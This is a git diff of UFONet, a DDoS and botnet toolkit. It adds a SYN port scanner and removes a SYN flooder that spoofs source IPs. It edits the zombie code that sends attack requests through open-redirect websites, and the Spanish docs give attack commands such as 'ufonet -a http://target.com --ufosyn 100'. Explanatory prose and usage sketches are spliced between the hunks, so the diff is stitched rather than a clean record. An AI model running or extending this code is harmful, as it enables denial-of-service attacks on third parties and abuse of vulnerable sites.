@@ -475,13 +475,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mp4, None, headers)
-                            mp4_file = urllib2.urlopen(req).read()
+                            mp4_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mp4, None, headers)
                             mp4_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mp4_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 mp4s[mp4] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -510,7 +510,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            ogg_file = urllib2.urlopen(req).read()
+                            ogg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             ogg_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -522,13 +522,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + ogg, None, headers)
-                            ogg_file = urllib2.urlopen(req).read()
+                            ogg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + ogg, None, headers)
                             ogg_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(ogg_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Audio')
+                    print('[Error] [AI] Unable to retrieve info from Audio -> [Discarding!]')
                     size = 0
                 oggs[ogg] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -557,7 +557,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            ogv_file = urllib2.urlopen(req).read()
+                            ogv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             ogv_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -569,13 +569,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + ogv, None, headers)
-                            ogv_file = urllib2.urlopen(req).read()
+                            ogv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + ogv, None, headers)
                             ogv_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(ogv_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 ogvs[ogv] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -604,7 +604,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            wmv_file = urllib2.urlopen(req).read()
+                            wmv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             wmv_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -616,13 +616,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + wmv, None, headers)
-                            wmv_file = urllib2.urlopen(req).read()
+                            wmv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + wmv, None, headers)
                             wmv_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(wmv_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 wmvs[wmv] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -651,7 +651,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            css_file = urllib2.urlopen(req).read()
+                            css_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             css_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -663,13 +663,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + css, None, headers)
-                            css_file = urllib2.urlopen(req).read()
+                            css_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + css, None, headers)
                             css_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(css_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Style')
+                    print('[Error] [AI] Unable to retrieve info from Style -> [Discarding!]')
                     size = 0
                 csss[css] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -698,7 +698,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            js_file = urllib2.urlopen(req).read()
+                            js_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             js_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -710,13 +710,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + js, None, headers)
-                            js_file = urllib2.urlopen(req).read()
+                            js_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + js, None, headers)
                             js_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(js_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Script')
+                    print('[Error] [AI] Unable to retrieve info from Script -> [Discarding!]')
                     size = 0
                 jss[js] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -745,7 +745,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            xml_file = urllib2.urlopen(req).read()
+                            xml_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             xml_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -757,13 +757,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + xml, None, headers)
-                            xml_file = urllib2.urlopen(req).read()
+                            xml_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + xml, None, headers)
                             xml_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(xml_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Script')
+                    print('[Error] [AI] Unable to retrieve info from Script -> [Discarding!]')
                     size = 0
                 xmls[xml] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -792,7 +792,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            php_file = urllib2.urlopen(req).read()
+                            php_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             php_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -804,13 +804,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + php, None, headers)
-                            php_file = urllib2.urlopen(req).read()
+                            php_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + php, None, headers)
                             php_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(php_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 phps[php] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -839,7 +839,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            html_file = urllib2.urlopen(req).read()
+                            html_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             html_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -851,13 +851,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + html, None, headers)
-                            html_file = urllib2.urlopen(req).read()
+                            html_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + html, None, headers)
                             html_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(html_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 htmls[html] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -886,7 +886,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            jsp_file = urllib2.urlopen(req).read()
+                            jsp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             jsp_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -898,13 +898,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + jsp, None, headers)
-                            jsp_file = urllib2.urlopen(req).read()
+                            jsp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + jsp, None, headers)
                             jsp_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(jsp_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 jsps[jsp] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -933,7 +933,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            asp_file = urllib2.urlopen(req).read()
+                            asp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             asp_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -945,13 +945,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + asp, None, headers)
-                            asp_file = urllib2.urlopen(req).read()
+                            asp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + asp, None, headers)
                             asp_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(asp_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 asps[asp] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -980,7 +980,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            txt_file = urllib2.urlopen(req).read()
+                            txt_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             txt_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -992,13 +992,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + txt, None, headers)
-                            txt_file = urllib2.urlopen(req).read()
+                            txt_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + txt, None, headers)
                             txt_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(txt_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Text file')
+                    print('[Error] [AI] Unable to retrieve info from Text file -> [Discarding!]')
                     size = 0
                 txts[txt] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -1034,9 +1034,9 @@ class Inspector(object):
         print '-'*20
         print '='*80
         if(biggest_files=={}):
-            print "\nNot any link found on target\n\n"
+            print "\n[Info] [AI] No links found on target! -> [Exiting!]\n\n"
             print '='*80 + '\n'
-            return #sys.exit(2)
+            return
         biggest_file_on_target = max(biggest_files.keys(), key=lambda x: biggest_files[x]) # search/extract biggest file value from dict
         target_host = urlparse(target)
         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
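biggest_files maps each discovered object to its size in bytes, so the heaviest one is simply a max() over the dict with the size as key. A tiny example of the idiom with made-up values:

     sizes = {"/logo.png": 4096, "/intro.mp4": 1048576, "/style.css": 2048}
     biggest = max(sizes.keys(), key=lambda k: sizes[k])
     print(biggest)  # '/intro.mp4' -> the largest object found on the target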

+ 113 - 0
core/tools/ufoscan.py

@@ -0,0 +1,113 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, time, socket, random, urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian-based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet port scanner (UFOSCAN) class
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+ 
+def scan(self, ip, port, openp, closed):
+    src_port = RandShort()
+    seq = randInt()
+    window = randInt()
+    p = IP(dst=ip)/TCP(sport=src_port, dport=port, seq=seq, window=window, flags='S')
+    resp = sr1(p, timeout=2)
+    if resp is None: # no reply at all
+        closed = closed + 1
+    elif resp.haslayer(TCP):
+        if resp.getlayer(TCP).flags == 0x12:
+            send_rst = sr(IP(dst=ip)/TCP(sport=src_port, dport=port, flags='AR'), timeout=1)
+            openp.append(port) # open port found!
+            print "\n" + "="*54
+            print "[Info] [AI] [UFOSCAN] OPEN port found! [ " + str(port) + " ]"
+            print "="*54 + "\n"
+        elif resp.getlayer(TCP).flags == 0x14:
+            closed = closed + 1
+    return openp, closed
+
+def is_up(ip):
+    p = IP(dst=ip)/ICMP()
+    resp = sr1(p, timeout=10)
+    if resp is None:
+        return False
+    elif resp.haslayer(ICMP):
+        return True
+
+class UFOSCAN(object):
+    def scanning(self, target, portX, portY):
+        print "[Info] [AI] [UFOSCAN] Emitting X-Ray into range: [ "+str(portX)+"-"+str(portY)+" ]\n"
+        print "="*74, "\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+        else:
+            print "[Error] [AI] [UFOSCAN] Target URL not valid ("+target+")! -> It should start with 'http(s)://'\n"
+            return
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse.urlparse(target)
+                a = r.query(url.netloc if url.netloc else target, "A") # A record (target may be a bare hostname)
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [UFOSCAN] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        start_time = time.time()
+        try:
+            ports = range(int(portX), int(portY+1))
+        except:
+            portX = 1
+            portY = 1024
+            print "[Info] [AI] [UFOSCAN] No valid port range selected. Using default: [ 1-1024 ]\n"
+            ports = range(int(portX), int(portY+1))
+        portX = str(portX)
+        portY = str(portY+1)
+        if is_up(ip):
+            openp = []
+            closed = 0
+            print "\n" + "="*44
+            print "[Info] [AI] [UFOSCAN] Host %s is UP!" % ip
+            print "="*44
+            print "-"*22
+            for port in ports:
+                openp, closed = scan(self, ip, port, openp, closed)
+            duration = time.time()-start_time
+            print "-"*22
+            print "="*44, "\n"
+            print "[Info] [AI] [UFOSCAN] Scan completed in: [ %s ]" % duration
+            if closed == len(ports):
+                print "\n[Info] [AI] [UFOSCAN] [ %s/%d ] CLOSED ports. -> [Exiting!]\n" % (closed, len(ports))
+            else:
+                print "\n[Info] [AI] [UFOSCAN] [ %s/%d ] OPEN ports FOUND!\n" % (len(openp), len(ports))
+                print "    [-] Target: [ " + str(ip) + " ]\n"
+                for o in openp:
+                    print "      [+] OPEN PORT: [ " + str(o) + " ]"
+                print ""
+        else:
+            duration = time.time()-start_time
+            print "-"*22
+            print "="*44, "\n"
+            print "[Info] [AI] [UFOSCAN] Host %s is DOWN!" % ip
+            print "\n[Info] [AI] [UFOSCAN] Scan completed in: [ %s ]" % duration + "\n"
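UFOSCAN is a straight SYN scan: is_up() first pings the host with ICMP, then scan() sends one SYN per port with random sequence and window values, counts a SYN/ACK reply (TCP flags 0x12) as an open port and answers it with a reset, while an RST/ACK (0x14) or silence counts as closed. A minimal usage sketch, assuming the module is importable as core.tools.ufoscan and that the process runs as root so scapy can emit raw packets (both assumptions):

     from core.tools.ufoscan import UFOSCAN   # path as added by this commit

     scanner = UFOSCAN()
     # X-Ray ports 1-1024 of the target; open ports are printed as they are found.
     scanner.scanning("http://target.com", 1, 1024)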

+ 26 - 0
core/txt/motherships.txt

@@ -99,3 +99,29 @@ Tardis
 Magrathea
 Covenant
 Ganymede
+R.DelaFuente
+Iditarod
+Asimov
+MissRoot
+Alcubierre
+Dirac
+Sócrates
+Seppala
+Aoroi
+Churinov
+Tukä
+Carl Sagan
+Hawking
+Agnódice
+Drake
+A.Scherr
+Munder
+Balto
+Sota
+UNIVAC
+Antikitera
+Togo
+Red Sprite
+C.Orquín
+Kräken
+Mitra

+ 0 - 61
core/ufosyn.py

@@ -1,61 +0,0 @@
-#!/usr/bin/env python 
-# -*- coding: utf-8 -*-"
-"""
-UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
-
-You should have received a copy of the GNU General Public License along
-with UFONet; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-import random, socket, os, sys
-from scapy.all import *
-
-# UFONet TCP SYN Flooder (UFOSYN)
-def randIP():
-	ip = ".".join(map(str, (random.randint(0,255)for _ in range(4))))
-	return ip
-
-def randInt():
-	x = random.randint(1,65535) # TCP ports
-	return x	
-
-def synize(ip, port, rounds):
-    n=0
-    for x in range (0,int(rounds)):
-        n=n+1
-        sport = randInt()
-        seq = randInt()
-        window = randInt()
-        IP_p = IP()
-        IP_p.src = randIP()
-        try:
-            IP_p.dst = ip
-        except:
-            print "[Error] UFOSYN: Failed to engage with 'quantum hook' ["+str(n)+"]"
-            break
-        TCP_l = TCP()	
-        TCP_l.sport = sport
-        TCP_l.dport = port
-        TCP_l.flags = "S"
-        TCP_l.seq = seq
-	TCP_l.window = window
-        try:
-            send(IP_p/TCP_l, verbose=0)
-            print "[Info] UFOSYN: Firing 'quantum hook' ["+str(n)+"] -> Status: FLOODING!"
-        except:
-            print "[Error] UFOSYN: Failed to engage with 'quantum hook' ["+str(n)+"]"
-
-class UFOSYN(object):
-    def attacking(self, target, rounds):
-        print "[Info] TCP SYN Flooder (UFOSYN) is ready to fire: [" , rounds, "quantum hooks ]\n"
-        if target.startswith('http://'):
-            target = target.replace('http://','')
-            port = 80
-        elif target.startswith('https://'):
-            target = target.replace('https://','')
-            port = 443
-        try:
-            ip = socket.gethostbyname(target)
-        except:
-            ip = target
-        synize(ip, port, rounds) # attack with UFOSYN using threading

+ 5 - 2
core/update.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - Denial of Service Toolkit - 2013/2014/2015/2016/2017/2018 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -16,13 +16,16 @@ class Updater(object):
     Update UFONet automatically from a .git repository
     """     
     def __init__(self):
-        GIT_REPOSITORY = "https://github.com/epsylon/ufonet"
+        GIT_REPOSITORY = "https://code.03c8.net/epsylon/ufonet"
+        GIT_REPOSITORY2 = "https://github.com/epsylon/ufonet"
         rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
         if not os.path.exists(os.path.join(rootDir, ".git")):
             print "Not any .git repository found!\n"
             print "="*30
             print "\nTo have working this feature, you should clone UFONet with:\n"
             print "$ git clone %s" % GIT_REPOSITORY
+            print "\nYou can also try this mirror:\n"
+            print "$ git clone %s" % GIT_REPOSITORY2 + "\n"
         else:
             checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
             print checkout
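The updater only works from a git clone: with no .git directory it just prints the two clone commands, otherwise it discards local edits and pulls. A minimal sketch of the same flow using plain subprocess calls (helper name and structure are illustrative, not taken from this commit):

     import os, subprocess

     REPOS = ["https://code.03c8.net/epsylon/ufonet",   # primary repository
              "https://github.com/epsylon/ufonet"]      # mirror

     def self_update(root):
         if not os.path.exists(os.path.join(root, ".git")):
             for repo in REPOS:
                 print("$ git clone " + repo)   # tell the user how to get a clone
             return
         subprocess.call(["git", "checkout", "."], cwd=root)   # drop local changes
         subprocess.call(["git", "pull"], cwd=root)            # fast-forward to latest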

File diff suppressed because it is too large
+ 700 - 188
core/webgui.py


+ 28 - 15
core/zombie.py

@@ -1,16 +1,22 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - DDoS Botnet via Web Abuse - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import pycurl, StringIO, md5, re
+import StringIO, md5, re, sys
 import time, threading, random
 from randomip import RandomIP
 
+try:
+    import pycurl
+except:
+    print "\nError importing: pycurl lib. \n\n To install it on Debian-based systems:\n\n $ 'sudo apt-get install python-pycurl' or 'pip install pycurl'\n"
+    sys.exit(2)
+
 class Zombie: # class representing a zombie
     # constructor: function to construct a zombie 
     # ufo: UFONet object, some state variables are recovered as well
@@ -45,7 +51,7 @@ class Zombie: # class representing a zombie
             c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
             c.setopt(pycurl.NOBODY, 0) # use GET
         if self.ufo.external == True:
-            external_service = "https://www.downforeveryoneorjustme.com/" # external check
+            external_service = "https://downforeveryoneorjustme.com/" # external check
             if options.target.startswith('https://'): # fixing url prefix
                 options.target = options.target.replace('https://','')
             if options.target.startswith('http://'): # fixing url prefix
@@ -72,7 +78,7 @@ class Zombie: # class representing a zombie
             else:                                    
                 url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
             if self.ufo.options.verbose:
-                print "[Info] Payload:", url_attack
+                print "[Info] [Zombies] Payload:", url_attack
             c.setopt(pycurl.URL, url_attack) # GET connection on target site
             c.setopt(pycurl.NOBODY, 0)  # use GET
         # set fake headers (important: no-cache)
@@ -140,16 +146,16 @@ class Zombie: # class representing a zombie
             c.setopt(pycurl.TIMEOUT, options.timeout)
             c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
         else:
-            c.setopt(pycurl.TIMEOUT, 5) # trying low value to control OS/python threading overflow when so much threads/bots open
-            c.setopt(pycurl.CONNECTTIMEOUT, 5)
+            c.setopt(pycurl.TIMEOUT, 1) # low value to help avoid OS/Python overload when too many threads/bots are open
+            c.setopt(pycurl.CONNECTTIMEOUT, 1)
         if options.delay: # set delay
             self.ufo.delay = options.delay
         else:
-            self.ufo.delay = 0
+            self.ufo.delay = 0 # default delay
         if options.retries: # set retries
             self.ufo.retries = options.retries
         else:
-            self.ufo.retries = 1
+            self.ufo.retries = 0 # default retries
         try: # try to connect
             c.perform()
             time.sleep(self.ufo.delay)
@@ -166,7 +172,7 @@ class Zombie: # class representing a zombie
             code_reply = c.getinfo(pycurl.HTTP_CODE)
             reply = b.getvalue()
             if options.verbose:
-                print "[Info] Reply:"
+                print "[Info] [AI] HEAD Reply:"
                 print "\n", reply
             if self.ufo.options.testrpc:
                 return reply
@@ -175,19 +181,26 @@ class Zombie: # class representing a zombie
         if self.ufo.external == True: # External reply
             external_reply = h.getvalue()
             if options.verbose:
-                print "[Info] Reply:"
+                print "[Info] [AI] EXTERNAL Reply:"
                 print "\n", external_reply
             return external_reply
         if self.payload == True: # Payloads reply
             payload_reply = h.getvalue()
             if options.verbose:
-                print "[Info] Reply:"
+                print "[Info] [AI] PAYLOAD Reply:"
                 print "\n", payload_reply
             return payload_reply
         if self.attack_mode == True: # Attack mode reply
             attack_reply = h.getvalue()
+            reply_code = c.getinfo(c.RESPONSE_CODE)
             if options.verbose:
-                print "[Response] code: ", c.getinfo(c.RESPONSE_CODE)," time ",c.getinfo(c.TOTAL_TIME)," size ", len(attack_reply)
-            return [    c.getinfo(c.RESPONSE_CODE), 
-                        c.getinfo(c.TOTAL_TIME), 
-                        len(attack_reply)]
+                print "[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(c.getinfo(c.TOTAL_TIME))+" | Size: " + str(len(attack_reply))+")"
+                time.sleep(5) # slow output down so multi-threaded replies stay readable
+            if len(attack_reply) == 0:
+                print "[Info] [Zombies] " + self.zombie + " -> FAILED (cannot connect!)"
+                if not self.ufo.options.disablepurge: # purge mode: discard failed zombies
+                    self.ufo.discardzombies.append(self.zombie)
+                    self.ufo.num_discard_zombies = self.ufo.num_discard_zombies + 1
+            return [c.getinfo(c.RESPONSE_CODE), 
+                    c.getinfo(c.TOTAL_TIME), 
+                    len(attack_reply)]
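Each zombie request is reported back as the triple [HTTP code, total time, reply size] read from the curl handle; a zero-byte reply now marks the zombie as failed and, unless purging is disabled, queues it for discard. A minimal standalone sketch of that measurement, assuming only pycurl and a placeholder URL:

     import pycurl, StringIO

     def measure(url, timeout=1):
         # GET the url and return the same triple the Zombie class reports:
         # HTTP response code, total transfer time and body size in bytes.
         body = StringIO.StringIO()
         c = pycurl.Curl()
         c.setopt(pycurl.URL, url)
         c.setopt(pycurl.WRITEFUNCTION, body.write)
         c.setopt(pycurl.FOLLOWLOCATION, 1)
         c.setopt(pycurl.TIMEOUT, timeout)
         c.setopt(pycurl.CONNECTTIMEOUT, timeout)
         try:
             c.perform()
             return [c.getinfo(pycurl.RESPONSE_CODE),
                     c.getinfo(pycurl.TOTAL_TIME),
                     len(body.getvalue())]
         except pycurl.error:
             return [0, 0.0, 0]   # a zero-byte reply is treated as a failed zombie

     print(measure("http://target.com/"))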

+ 31 - 10
docs/LEEME.txt

@@ -42,7 +42,7 @@ UFONet - es un conjunto de herramientas diseñado para lanzar ataques DDoS y DoS
 En los siguientes enlaces tienes más información:
 
    - CWE-601:Open Redirect: 
-     http://cwe.mitre.org/data/definitions/601.html
+     https://cwe.mitre.org/data/definitions/601.html
 
    - OWASP:URL Redirector Abuse: 
      https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
@@ -113,8 +113,8 @@ Por defecto, UFONet utiliza un motor de búsqueda que se llama 'Yahoo'. Pero pue
 
 Ésta es la lista de motores de búsqueda que funcionan con la fecha de la última vez que se han probado:
 
-        - bing [26/09/2018: OK!]
-        - yahoo [26/09/2018: OK!]
+        - bing  [30/12/2018: OK!]
+        - yahoo [30/12/2018: OK!]
 
 También puedes buscar masívamente utilizando todos los motores de búsqueda soportados:
 
@@ -132,12 +132,12 @@ O puedes hacer que la herramienta búsque de manera autómatica el mayor número
 Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido, 
 para ver si las urls son vulnerables.
 
-       Want to check if they are valid zombies? (Y/n)
+      Do you want to check if the NEW possible zombies are valid? (Y/n)
 
-También serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente 
+Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente 
 aquellas aplicaciones web que sean vulnerables.
 
-       Want to update your list? (Y/n)
+      Do you want to update your army? (Y/n)
 
 Si respondes 'Y', tus nuevos 'zombies' se sumarán al fichero: zombies.txt
 
@@ -181,7 +181,12 @@ Finalmente, puedes ordenar a tus 'zombies' que te ataquen a ti mismo, para ver c
 Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido, 
 para ver si las urls son vulnerables.
 
-       Want to check if they are valid zombies? (Y/n)
+       Do you want to check if the NEW possible zombies are valid? (Y/n)
+
+Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
+aquellas aplicaciones web que sean vulnerables.
+
+      Do you want to update your army? (Y/n)
 
 Si respondes 'Y', tu fichero: "botnet/zombies.txt" será actualizado.
 
@@ -347,11 +352,23 @@ Y también puedes conectar UFOSYN (requiere acceso mediante 'root') para comenza
 
      sudo python ufonet -a http://target.com --ufosyn 100
 
